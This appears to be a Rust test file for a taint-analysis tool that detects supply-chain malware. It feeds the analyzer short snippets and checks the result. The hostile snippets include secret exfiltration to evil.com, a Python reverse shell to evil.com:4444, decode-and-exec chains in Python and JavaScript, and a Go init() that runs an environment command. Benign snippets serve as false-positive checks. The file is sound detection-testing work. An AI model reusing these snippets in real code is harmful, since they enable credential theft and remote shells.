// pyrograph 0.1.0
//
// GPU-accelerated taint analysis for supply chain malware detection
// Documentation
//! BREAK-IT tests: designed to expose real bugs across ALL pyrograph parsers.
//! A failing test here means the taint-analysis engine missed a flow or
//! produced a false positive — it is a finding, NOT a bug in the test.

use pyrograph::analyze;

// ---------------------------------------------------------------------------
// RUST
// ---------------------------------------------------------------------------

/// Case 1: taint flowing through `format!` arguments must be reported.
///
/// The snippet reads `SECRET` via `std::env::var`, interpolates it into a URL
/// with `format!`, and passes that URL to `reqwest::get`. The test FAILS when
/// analysis of the parsed snippet yields no findings, i.e. the engine did not
/// carry taint from the macro's arguments over to its result.
#[cfg(feature = "rust-lang")]
#[test]
fn rust_format_macro_propagates_taint() {
    let snippet = r#"
        fn main() {
            let secret = std::env::var("SECRET").unwrap();
            let url = format!("http://evil.com/{}", secret);
            reqwest::get(url);
        }
    "#;

    // Parse first, then analyze; an error at either stage panics the test.
    let parsed = pyrograph::parse::parse_rust(snippet, "main.rs").unwrap();
    let report = analyze(&parsed).unwrap();

    let flow_detected = !report.is_empty();
    assert!(
        flow_detected,
        "ENGINE BUG: taint did not propagate through format! macro args"
    );
}

/// Case 2: taint must survive a chain of plain variable re-bindings.
///
/// The snippet moves an environment value through `x -> y -> z` before
/// passing `&z` to `reqwest::get`. The test FAILS when the analysis returns
/// no findings, meaning taint was dropped somewhere along the chain.
#[cfg(feature = "rust-lang")]
#[test]
fn rust_multi_hop_variable_chain() {
    let snippet = r#"
        fn main() {
            let x = std::env::var("T").unwrap();
            let y = x;
            let z = y;
            let _ = reqwest::get(&z);
        }
    "#;

    // Parse first, then analyze; an error at either stage panics the test.
    let parsed = pyrograph::parse::parse_rust(snippet, "main.rs").unwrap();
    let report = analyze(&parsed).unwrap();

    let flow_detected = !report.is_empty();
    assert!(
        flow_detected,
        "ENGINE BUG: taint lost across multi-hop variable chain"
    );
}

/// Case 7-RUST: benign Rust code must produce zero findings.
///
/// The snippet parses `PORT` from the environment and only prints it, while
/// `reqwest::get` is called with a string literal. The test FAILS when the
/// analysis returns any finding at all.
#[cfg(feature = "rust-lang")]
#[test]
fn rust_benign_no_false_positive() {
    let snippet = r#"
        fn main() {
            let port = std::env::var("PORT").unwrap().parse::<u16>().unwrap();
            println!("Listening on {}", port);
            let safe = "https://example.com";
            reqwest::get(safe);
        }
    "#;

    // Parse first, then analyze; an error at either stage panics the test.
    let parsed = pyrograph::parse::parse_rust(snippet, "main.rs").unwrap();
    let report = analyze(&parsed).unwrap();

    let nothing_flagged = report.is_empty();
    assert!(
        nothing_flagged,
        "ENGINE BUG: false positive on benign Rust code"
    );
}

// ---------------------------------------------------------------------------
// PYTHON
// ---------------------------------------------------------------------------

/// Case 3: three-step Python chain `os.environ -> base64.b64decode -> exec`.
///
/// The snippet decodes an environment value with `base64.b64decode` and
/// passes the result to `exec`. The test FAILS when the analysis returns no
/// findings, i.e. taint was not tracked through the `b64decode` return value.
#[cfg(feature = "python")]
#[test]
fn python_three_step_chain_exec_b64decode() {
    let snippet = r#"
import os
import base64
payload = base64.b64decode(os.environ['P'])
exec(payload)
"#;

    // Parse first, then analyze; an error at either stage panics the test.
    let parsed = pyrograph::parse::parse_python(snippet, "malware.py").unwrap();
    let report = analyze(&parsed).unwrap();

    let flow_detected = !report.is_empty();
    assert!(
        flow_detected,
        "ENGINE BUG: missed 3-step chain os.environ -> b64decode -> exec"
    );
}

/// Case 4: Python reverse shell wiring a socket into `subprocess.Popen`.
///
/// The snippet connects a `socket.socket()` to a remote host and hands it to
/// `subprocess.Popen(["/bin/sh"], stdin=s)`. The test treats the socket as a
/// network source and the shell's stdin as a command sink, and FAILS when the
/// analysis returns no findings.
#[cfg(feature = "python")]
#[test]
fn python_reverse_shell_popen_socket_stdin() {
    let snippet = r#"
import subprocess
import socket
s = socket.socket()
s.connect(("evil.com", 4444))
subprocess.Popen(["/bin/sh"], stdin=s)
"#;

    // Parse first, then analyze; an error at either stage panics the test.
    let parsed = pyrograph::parse::parse_python(snippet, "revshell.py").unwrap();
    let report = analyze(&parsed).unwrap();

    let flow_detected = !report.is_empty();
    assert!(
        flow_detected,
        "ENGINE BUG: missed reverse shell subprocess.Popen(stdin=socket)"
    );
}

/// Case 7-PYTHON: benign Python code must produce zero findings.
///
/// The snippet reads `PORT` from the environment, converts it with `int`, and
/// prints it. The test FAILS when the analysis returns any finding at all.
#[cfg(feature = "python")]
#[test]
fn python_benign_no_false_positive() {
    let snippet = r#"
import os
port = int(os.environ.get("PORT", "8080"))
print(f"Server starting on port {port}")
"#;

    // Parse first, then analyze; an error at either stage panics the test.
    let parsed = pyrograph::parse::parse_python(snippet, "clean.py").unwrap();
    let report = analyze(&parsed).unwrap();

    let nothing_flagged = report.is_empty();
    assert!(
        nothing_flagged,
        "ENGINE BUG: false positive on benign Python code"
    );
}

// ---------------------------------------------------------------------------
// JAVASCRIPT
// ---------------------------------------------------------------------------

/// Case 5: JavaScript chain `process.env -> Buffer.from -> .toString -> eval`.
///
/// The snippet base64-decodes an environment value through
/// `Buffer.from(...).toString()` and evaluates the result. The test FAILS
/// when the analysis returns no findings, i.e. taint did not propagate
/// through the chained call.
#[cfg(feature = "js")]
#[test]
fn js_chained_eval_buffer_from_base64() {
    let snippet = r#"
        var payload = Buffer.from(process.env.P, 'base64').toString();
        eval(payload);
    "#;

    // Parse first, then analyze; an error at either stage panics the test.
    let parsed = pyrograph::parse::parse_js(snippet, "malware.js").unwrap();
    let report = analyze(&parsed).unwrap();

    let flow_detected = !report.is_empty();
    assert!(
        flow_detected,
        "ENGINE BUG: missed chain process.env -> Buffer.from -> toString -> eval"
    );
}

/// Case 7-JS: benign JavaScript code must produce zero findings.
///
/// The snippet reads `process.env.PORT` with a numeric fallback and only
/// logs it, alongside a literal config object. The test FAILS when the
/// analysis returns any finding at all.
#[cfg(feature = "js")]
#[test]
fn js_benign_no_false_positive() {
    let snippet = r#"
        const port = process.env.PORT || 3000;
        console.log('Starting server on port', port);
        const config = { host: 'localhost' };
        console.log(config);
    "#;

    // Parse first, then analyze; an error at either stage panics the test.
    let parsed = pyrograph::parse::parse_js(snippet, "clean.js").unwrap();
    let report = analyze(&parsed).unwrap();

    let nothing_flagged = report.is_empty();
    assert!(
        nothing_flagged,
        "ENGINE BUG: false positive on benign JS code"
    );
}

// ---------------------------------------------------------------------------
// GO
// ---------------------------------------------------------------------------

/// Case 6: direct Go flow `os.Getenv -> exec.Command -> Run`.
///
/// The snippet reads an environment variable inside `init` and executes it
/// with `exec.Command(cmd).Run()`. The test FAILS when the analysis returns
/// no findings.
#[cfg(feature = "go")]
#[test]
fn go_direct_exec_command_env() {
    let snippet = r#"
        package main
        import "os"
        import "os/exec"
        func init() {
            cmd := os.Getenv("C")
            exec.Command(cmd).Run()
        }
    "#;

    // Parse first, then analyze; an error at either stage panics the test.
    let parsed = pyrograph::parse::parse_go(snippet, "main.go").unwrap();
    let report = analyze(&parsed).unwrap();

    let flow_detected = !report.is_empty();
    assert!(
        flow_detected,
        "ENGINE BUG: missed direct flow os.Getenv -> exec.Command.Run"
    );
}

/// Case 7-GO: benign Go code must produce zero findings.
///
/// The snippet reads `PORT` via `os.Getenv` and only prints it with
/// `fmt.Println`. The test FAILS when the analysis returns any finding at all.
#[cfg(feature = "go")]
#[test]
fn go_benign_no_false_positive() {
    let snippet = r#"
        package main
        import "os"
        import "fmt"
        func main() {
            port := os.Getenv("PORT")
            fmt.Println("Port:", port)
        }
    "#;

    // Parse first, then analyze; an error at either stage panics the test.
    let parsed = pyrograph::parse::parse_go(snippet, "clean.go").unwrap();
    let report = analyze(&parsed).unwrap();

    let nothing_flagged = report.is_empty();
    assert!(
        nothing_flagged,
        "ENGINE BUG: false positive on benign Go code"
    );
}